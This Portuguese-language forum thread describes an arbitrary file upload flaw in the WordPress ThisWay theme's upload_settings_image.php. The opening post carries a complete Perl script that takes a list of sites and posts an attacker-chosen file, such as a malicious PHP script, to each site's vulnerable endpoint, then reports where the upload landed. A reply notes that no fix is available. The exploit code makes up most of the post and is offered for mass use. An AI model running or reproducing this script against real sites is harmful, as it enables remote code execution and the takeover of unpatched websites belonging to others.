Resultados 1 a 2 de 2

Tópico: WP Thisway Theme File Upload

  1. #1
    Membro ingresso
    Data de Ingresso
    Apr 2012
    Posts
    70
    Post Thanks / Like

    WP Thisway Theme File Upload

    A vulnerabilidade é causada devido ao script wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php permitindo o upload de arquivos com extensões arbitrárias para uma pasta dentro do webroot. Isto pode ser explorado para executar código PHP arbitrário fazendo o upload de um script PHP malicioso.

    Código PHP:
    #!/usr/bin/perl
     
    use LWP::UserAgent;
    use 
    warnings;
    use 
    strict;
     
    my $vull "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php";
     
    die(
    "\n[+] WP thisway theme file upload\n[*] Coder => MMxM\n[+] $0 <site-list> <file-to-up>\n\n") if($#ARGV != 1);
     
    open(my $arq,'<'.$ARGV[0]) || die($!);
    open(my $test,'<'.$ARGV[1]) || die($!);
    my @site = <$arq>;
    @
    site grep { !/^$/ } @site;
     
    close($arq);
    close($test);
     
    print 
    "\n[".($#site+1)."] URL to test upload\n\n";
     
    foreach my $url(@site){
        
    chomp($url);
        if(
    $url !~ /^(http|https):\/\//){
            
    $url 'http://'.$url;
        }
     
        
    $url $url.$vull;
        print 
    "[TESTING] $url\n";
        
    my $ua LWP::UserAgent->new;
        
    $ua->timeout(10);
        
    my $response $ua->post$url,
            
    Content_Type => 'form-data',
            
    Content => [ 'Filedata' => ["$ARGV[1]"] ]
        );
        
    my $body $response->content;
        if(
    $body =~ /rel=\\"(.*?)">/){
            
    my $out = $1;
            
    $out =~ s/\\//g;
            
    print "[UPLOAD] $out\n";
        } else {
            print 
    "[FAIL =/]\n"
        
    }

    Código: Github

    Vídeo demonstrativo:

    Última edição por str0p; 23 Nov 2013 às 09:14.

  2. #2
    Veterano ingresso
    Data de Ingresso
    Jan 2011
    Localização
    Pguá ~ PR
    Posts
    2.363
    Post Thanks / Like
    Bacana o vídeo. Parece que até o momento não há solução para essa falha.


    Tomei a liberdade de editar a postagem inicial adicionando mais informações.

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •